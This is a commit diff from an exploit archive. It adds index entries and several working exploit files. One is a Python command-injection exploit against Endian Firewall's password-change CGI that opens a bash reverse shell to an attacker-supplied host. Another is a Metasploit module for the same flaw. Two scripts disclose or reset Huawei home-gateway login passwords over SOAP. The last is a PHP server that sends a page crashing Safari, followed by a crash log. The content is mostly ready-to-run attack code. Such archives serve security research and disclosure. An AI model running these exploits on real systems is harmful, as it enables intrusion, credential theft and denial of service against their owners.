DB: 2015-07-03

13 new exploits

files.csv

@@ -24567,7 +24567,7 @@ id,file,description,date,author,platform,type,port
 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN Cross-Site Scripting Vulnerability",2006-03-21,"ILION Research",hardware,remote,0
 27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 Status_Image.PHP Cross-Site Scripting Vulnerability",2006-03-22,kspecial,php,webapps,0
 27454,platforms/php/webapps/27454.txt,"Motorola Bluetooth Interface Dialog Spoofing Vulnerability",2006-03-22,kspecial,php,webapps,0
-27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
+27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0
@@ -33739,6 +33739,7 @@ id,file,description,date,author,platform,type,port
 37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component 'script.php' Arbitrary File Upload Vulnerability",2012-06-13,"Sammy FORGIT",php,webapps,0
 37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component 'helper.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
 37384,platforms/lin_x86-64/shellcode/37384.c,"Linux x86 - execve /bin/sh (23 Bytes)",2015-06-26,"Bill Borskey",lin_x86-64,shellcode,0
+37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof Of Concept",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
 37387,platforms/php/webapps/37387.txt,"Koha <= 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
 37388,platforms/php/webapps/37388.txt,"Koha <= 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
 37389,platforms/php/webapps/37389.txt,"Koha <= 3.20.1 - Multiple XSS and XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
@@ -33773,7 +33774,11 @@ id,file,description,date,author,platform,type,port
 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
+37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
+37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
 37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0
+37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module)",2015-06-29,"Ben Lincoln",cgi,remote,0
 37430,platforms/php/webapps/37430.txt,"CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0
 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
 37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
@@ -33799,3 +33804,11 @@ id,file,description,date,author,platform,type,port
 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
+37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
+37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
+37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
+37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
+37461,platforms/php/webapps/37461.txt,"DigPHP 'dig.php' Script Remote File Disclosure Vulnerability",2012-06-26,"Ryuzaki Lawlet",php,webapps,0
+37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 '.avi' File Denial of Service Vulnerability",2012-06-28,Dark-Puzzle,windows,dos,0
+37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-06-28,Dark-Puzzle,windows,dos,0
+37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80

platforms/cgi/remote/37426.py

@@ -0,0 +1,75 @@
+#!/usr/bin/env python
+
+# Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi)
+# OS Command Injection Exploit POC (Reverse TCP Shell)
+# Ben Lincoln, 2015-06-28
+# http://www.beneaththewaves.net/
+# Requires knowledge of a valid proxy username and password on the target Endian Firewall
+
+import httplib
+import sys
+
+proxyUserPasswordChangeURI = "/cgi-bin/chpasswd.cgi"
+
+def main():
+	if len(sys.argv) < 7:
+		print "Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) Exploit\r\n"
+		print "Usage: " + sys.argv[0] + " [TARGET_SYSTEM_IP] [TARGET_SYSTEM_WEB_PORT] [PROXY_USER_NAME] [PROXY_USER_PASSWORD] [REVERSE_SHELL_IP] [REVERSE_SHELL_PORT]\r\n"
+		print "Example: " + sys.argv[0] + " 172.16.97.1 10443 proxyuser password123 172.16.97.17 443\r\n"
+		print "Be sure you've started a TCP listener on the specified IP and port to receive the reverse shell when it connects.\r\n"
+		print "E.g. ncat -nvlp 443"
+		sys.exit(1)
+
+	multipartDelimiter = "---------------------------334002631541493081770656718"
+	
+	targetIP = sys.argv[1]
+	targetPort = sys.argv[2]
+	userName = sys.argv[3]
+	password = sys.argv[4]
+	reverseShellIP = sys.argv[5]
+	reverseShellPort = sys.argv[6]
+
+	exploitString = password + "; /bin/bash -c /bin/bash -i >& /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;"
+
+	endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
+
+	conn = httplib.HTTPSConnection(targetIP, targetPort)
+	headers = {}
+	headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0"
+	headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+	headers["Accept-Encoding"] = ""
+	headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
+	headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter
+	headers["Accept-Language"] = "en-US,en;q=0.5"
+	headers["Connection"] = "keep-alive"
+
+	multipartDelimiter = "--" + multipartDelimiter
+
+	body = multipartDelimiter + "\r\n"
+	body = body + "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
+	body = body + "change\r\n"
+	body = body + multipartDelimiter + "\r\n"
+	body = body + "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
+	body = body + userName + "\r\n"
+	body = body + multipartDelimiter + "\r\n"
+	body = body + "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
+	body = body + password + "\r\n"
+	body = body + multipartDelimiter + "\r\n"
+	body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
+	body = body + exploitString + "\r\n"
+	body = body + multipartDelimiter + "\r\n"
+	body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
+	body = body + exploitString + "\r\n"
+	body = body + multipartDelimiter + "\r\n"
+	body = body + "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
+	body = body + "  Change password\r\n"
+	body = body + multipartDelimiter + "--" + "\r\n"
+
+	conn.request("POST", proxyUserPasswordChangeURI, body, headers)
+	response = conn.getresponse()
+	print "HTTP " + str(response.status) + " " + response.reason + "\r\n"
+	print response.read()
+	print "\r\n\r\n"
+
+if __name__ == "__main__":
+    main()

platforms/cgi/remote/37428.txt

@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Endian Firewall < 3.0.0 Proxy Password Change Command Injection',
+      'Description' => %q{
+        This module exploits an OS command injection vulnerability in a 
+        web-accessible CGI script used to change passwords for locally-defined
+        proxy user accounts. Valid credentials for such an account are 
+        required.
+        Command execution will be in the context of the "nobody" account, but 
+        on versions of EFW I tested, this account had broad sudo permissions, 
+        including to run the script /usr/local/bin/chrootpasswd as root. This 
+        script changes the password for the Linux root account on the system 
+        to the value specified by console input once it is executed.
+        The password for the proxy user account specified will *not* be 
+        changed by the use of this module, as long as the target system is 
+        vulnerable to the exploit.
+        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
+        HTTP basic auth credentials as well to exploit this vulnerability.
+        Use the standard USERNAME and PASSWORD advanced options to specify
+        these values if required.
+        Versions >= 3.0.0 still contain the vulnerable code, but it appears to 
+        never be executed due to a bug in the vulnerable CGI script which also
+        prevents normal use.
+        Tested successfully against the following versions of EFW Community:
+        1.1 RC5, 2.0, 2.1, 2.5.1, 2.5.2.
+	Used Apache mod_cgi Bash Environment Variable Code Injection 
+	and Novell ZENworks Configuration Management Remote Execution
+	modules	as templates.
+      },
+      'Author' => [
+	'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
+      ],
+      'References' => [
+#        ['CVE', ''],
+#        ['OSVDB', ''],
+#        ['EDB', ''],
+        ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
+      ],
+      'Privileged'  => false,
+      'Platform'    => %w{ linux },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d",
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 10443
+        },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', 
+        '/cgi-bin/chpasswd.cgi']),
+      OptString.new('EFW_USERNAME', [true, 
+        'Valid proxy account username for the target system']),
+      OptString.new('EFW_PASSWORD', [true, 
+        'Valid password for the proxy user account']),
+      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
+      OptString.new('RPATH', [true, 
+        'Target PATH for binaries used by the CmdStager', '/bin']),
+      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
+     ], self.class)
+  end
+
+  def exploit
+    # Cannot use generic/shell_reverse_tcp inside an elf
+    # Checking before proceeds
+    if generate_payload_exe.blank?
+      fail_with(Failure::BadConfig, 
+        "#{peer} - Failed to store payload inside executable, " + 
+        "please select a native payload")
+    end
+
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], 
+      :nodelete => true)
+  end
+
+  def execute_command(cmd, opts)
+    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+
+    req(cmd)
+  end
+
+  def req(cmd)
+    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
+
+    boundary = "----#{rand_text_alpha(34)}"
+    data = "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
+    data << "change\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
+    data << "#{datastore['EFW_USERNAME']}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
+    data << "#{datastore['EFW_PASSWORD']}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
+    data << "#{sploit}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
+    data << "#{sploit}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
+    data << "  Change password\r\n"
+    data << "--#{boundary}--\r\n"
+
+    refererUrl = 
+      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + 
+      "#{datastore['TARGETURI']}"
+
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => datastore['TARGETURI'],
+	'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'headers' => {
+          'Referer' => refererUrl
+        },
+        'data' => data
+      }, datastore['TIMEOUT'])
+
+  end
+
+end

platforms/hardware/webapps/37424.py

@@ -0,0 +1,56 @@
+#! /usr/bin/python
+
+# Exploit Title: Huawei Home Gateway password disclosure
+# Date: June 27, 2015
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Vendor Homepage: http://www.huawei.com/en/
+# Software Link: N/A.
+# Version: UPnP/1.0 IGD/1.00
+# Tested on: HG530 - HG520b (Provided by TE-DATA egypt)
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+
+import socket
+import sys
+import re
+
+if len(sys.argv) !=2:
+    print "[*] Please enter the target ip."
+    print "[*] Usage : " + sys.argv[0] + " IP_ADDR"
+    exit()
+# Create a TCP/IP socket
+target_host = sys.argv[1]
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# Connect the socket to the port where the server is listening
+server_address = (target_host, 80)
+print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+try:
+    soap = "<?xml version=\"1.0\"?>"
+    soap +="<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    soap +="<s:Body>"
+    soap +="<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
+    soap +="</m:GetLoginPassword>"
+    soap +="</s:Body>"
+    soap +="</s:Envelope>"
+    message = "POST /UD/?5 HTTP/1.1\r\n"
+    message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#GetLoginPassword\"\r\n"
+    message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
+    message += "Host:" + target_host + "\r\n"
+    message += "Content-Length:" + str(len(soap)) +"\r\n"
+    message += "Expect: 100-continue\r\n"
+    message += "Connection: Keep-Alive\r\n\r\n"
+    sock.send(message)
+    data = sock.recv(1024)
+    print "[*] Recieved : " + data.strip()
+    sock.send(soap)
+    data = sock.recv(1024)
+    data += sock.recv(1024)
+    #print data
+    r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
+    m = r.search(data)
+    if m:
+        print "[*] Found the password: " + m.group(1)
+finally:
+    sock.close()

platforms/hardware/webapps/37425.py

@@ -0,0 +1,55 @@
+#! /usr/bin/python
+
+# Exploit Title: Huawei Home Gateway password change vulnerability
+# Date: June 27, 2015
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Vendor Homepage: http://www.huawei.com/en/
+# Software Link: N/A.
+# Version: UPnP/1.0 IGD/1.00
+# Tested on: HG530 - HG520b (Provided by TE-DATA egypt)
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+
+import socket
+import sys
+import re
+
+if len(sys.argv) !=3:
+    print "[*] Please enter the target ip and the new password."
+    print "[*] Usage : " + sys.argv[0] + " IP_ADDR NEW_PASS"
+    exit()
+
+# Create a TCP/IP socket
+target_host = sys.argv[1]
+new_pass = sys.argv[2]
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# Connect the socket to the port where the server is listening
+server_address = (target_host, 80)
+print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+try:
+    soap = "<?xml version=\"1.0\"?>"
+    soap +="<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    soap +="<s:Body>"
+    soap +="<m:SetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
+    soap +="<NewUserpassword>"+new_pass+"</NewUserpassword>"
+    soap +="</m:SetLoginPassword>"
+    soap +="</s:Body>"
+    soap +="</s:Envelope>"
+    message = "POST /UD/?5 HTTP/1.1\r\n"
+    message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#SetLoginPassword\"\r\n"
+    message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
+    message += "Host:" + target_host + "\r\n"
+    message += "Content-Length: " + str(len(soap)) + "\r\n"
+    message += "Expect: 100-continue\r\n"
+    message += "Connection: Keep-Alive\r\n\r\n"
+    sock.send(message)
+    data = sock.recv(1024)
+    print "[*] Recieved : " + data.strip()
+    sock.send(soap)
+    data = sock.recv(1024)
+    data += sock.recv(1024)
+    print "[*] Done."
+finally:
+    sock.close()

platforms/osx/dos/37386.php

@@ -0,0 +1,204 @@
+#!/usr/bin/php
+<?php
+# Title          :  Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of 
+Concept
+# Product Website:  https://www.apple.com/safari/
+# Author         :  Mohammad Reza Espargham
+# Linkedin       :  https://ir.linkedin.com/in/rezasp
+# E-Mail         :  me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website        :  www.reza.es
+# Twitter        :  https://twitter.com/rezesp
+# FaceBook       :  https://www.facebook.com/mohammadreza.espargham
+
+
+
+# Usage :
+# php poc.php
+# Open Safari and open ip:8080 / 127.0.0.1:8080
+# Crashed ;)
+
+#Main POC Code
+$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create 
+socket!');
+socket_bind($reza, 0,8080);
+socket_listen($reza);
+print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
+$msg = 
+'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
+$msgd=base64_decode($msg);
+for (;;) {
+         if ($client = @socket_accept($reza)) {
+             socket_write($client, "HTTP/1.1 200 OK\r\n" .
+             "Content-length: " . strlen($msgd) . "\r\n" .
+             "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
+             $msgd);
+         }
+         else usleep(100000);
+}
+
+
+
+
+
+#Crash Report
+/*
+
+Process Model:
+Multiple Web Processes
+
+
+Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
+0   libsystem_kernel.dylib        	0x00007fff8e628286 __pthread_kill + 
+10
+1   libsystem_c.dylib             	0x00007fff90619b53 abort + 129
+2   libsystem_c.dylib             	0x00007fff905e1c39 __assert_rtn + 321
+3   com.apple.CoreGraphics        	0x00007fff87716e4e 
+CGPathCreateMutableCopyByTransformingPath + 242
+4   com.apple.CoreGraphics        	0x00007fff8773aff0 CGContextAddPath + 
+93
+5   com.apple.WebCore             	0x0000000104ea8c84 
+WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
+6   com.apple.WebCore             	0x000000010597e851 
+WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, 
+WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, 
+WebCore::RenderSVGShape const*) + 65
+7   com.apple.WebCore             	0x000000010597f08a 
+WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, 
+WebCore::GraphicsContext*) + 122
+8   com.apple.WebCore             	0x000000010597f3c3 
+WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
+9   com.apple.WebCore             	0x0000000104fa73cb 
+WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
+const&) + 379
+10  com.apple.WebCore             	0x0000000104fa7062 
+WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&) + 1330
+11  com.apple.WebCore             	0x0000000104f1ee72 
+WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
+const&) + 722
+12  com.apple.WebCore             	0x0000000105429e88 
+WebCore::InlineElementBox::paint(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 
+312
+13  com.apple.WebCore             	0x0000000104ea4a63 
+WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
+const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
+14  com.apple.WebCore             	0x0000000104ea4509 
+WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
+const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
+15  com.apple.WebCore             	0x0000000104e53d96 
+WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, 
+WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
+16  com.apple.WebCore             	0x0000000104e51373 
+WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&) + 67
+17  com.apple.WebCore             	0x0000000104e50724 
+WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&) + 420
+18  com.apple.WebCore             	0x0000000104e529af 
+WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
+const&) + 287
+19  com.apple.WebCore             	0x00000001058db139 
+WebCore::RenderBlock::paintChild(WebCore::RenderBox&, 
+WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, 
+bool) + 393
+20  com.apple.WebCore             	0x0000000104e51478 
+WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
+21  com.apple.WebCore             	0x0000000104e51420 
+WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&) + 240
+22  com.apple.WebCore             	0x0000000104e50724 
+WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
+WebCore::LayoutPoint const&) + 420
+23  com.apple.WebCore             	0x0000000104e529af 
+WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
+const&) + 287
+24  com.apple.WebCore             	0x0000000104e512b2 
+WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, 
+WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, 
+WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo 
+const&, unsigned int, WebCore::RenderObject*) + 370
+25  com.apple.WebCore             	0x0000000104e50f87 
+WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 
+1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, 
+WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, 
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, 
+WebCore::RenderObject*, bool, bool) + 423
+26  com.apple.WebCore             	0x0000000104e4fc30 
+WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
+27  com.apple.WebCore             	0x0000000104e4f002 
+WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, 
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
+28  com.apple.WebCore             	0x0000000104e4fd62 
+WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
+29  com.apple.WebCore             	0x0000000104e7ac36 
+WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer 
+const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned 
+int, unsigned int) + 358
+30  com.apple.WebCore             	0x000000010593757f 
+WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer 
+const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect 
+const&) + 799
+31  com.apple.WebCore             	0x000000010537dd44 
+WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, 
+WebCore::FloatRect const&) + 132
+32  com.apple.WebCore             	0x00000001058b6ad9 
+WebCore::PlatformCALayer::drawLayerContents(CGContext*, 
+WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, 
+WTF::CrashOnOverflow>&) + 361
+33  com.apple.WebCore             	0x0000000105b170a7 
+WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, 
+WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
+34  com.apple.WebCore             	0x0000000105ba36cc -[WebSimpleLayer 
+drawInContext:] + 172
+35  com.apple.QuartzCore          	0x00007fff8d7033c7 
+CABackingStoreUpdate_ + 3306
+36  com.apple.QuartzCore          	0x00007fff8d7026d7 
+___ZN2CA5Layer8display_Ev_block_invoke + 59
+37  com.apple.QuartzCore          	0x00007fff8d702694 
+x_blame_allocations + 81
+38  com.apple.QuartzCore          	0x00007fff8d6f643c 
+CA::Layer::display_() + 1546
+39  com.apple.WebCore             	0x0000000105ba35eb -[WebSimpleLayer 
+display] + 43
+40  com.apple.QuartzCore          	0x00007fff8d6f47fd 
+CA::Layer::display_if_needed(CA::Transaction*) + 603
+41  com.apple.QuartzCore          	0x00007fff8d6f3e81 
+CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
+42  com.apple.QuartzCore          	0x00007fff8d6f3612 
+CA::Context::commit_transaction(CA::Transaction*) + 242
+43  com.apple.QuartzCore          	0x00007fff8d6f33ae 
+CA::Transaction::commit() + 390
+44  com.apple.QuartzCore          	0x00007fff8d701f19 
+CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, 
+void*) + 71
+45  com.apple.CoreFoundation      	0x00007fff869f7127 
+__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
+46  com.apple.CoreFoundation      	0x00007fff869f7080 
+__CFRunLoopDoObservers + 368
+47  com.apple.CoreFoundation      	0x00007fff869e8bf8 
+CFRunLoopRunSpecific + 328
+48  com.apple.HIToolbox           	0x00007fff8df1156f 
+RunCurrentEventLoopInMode + 235
+49  com.apple.HIToolbox           	0x00007fff8df112ea 
+ReceiveNextEventCommon + 431
+50  com.apple.HIToolbox           	0x00007fff8df1112b 
+_BlockUntilNextEventMatchingListInModeWithFilter + 71
+51  com.apple.AppKit              	0x00007fff8ebe59bb _DPSNextEvent + 
+978
+52  com.apple.AppKit              	0x00007fff8ebe4f68 -[NSApplication 
+nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
+53  com.apple.AppKit              	0x00007fff8ebdabf3 -[NSApplication 
+run] + 594
+54  com.apple.AppKit              	0x00007fff8eb57354 NSApplicationMain 
++ 1832
+55  libxpc.dylib                  	0x00007fff8ab77958 _xpc_objc_main + 
+793
+56  libxpc.dylib                  	0x00007fff8ab79060 xpc_main + 490
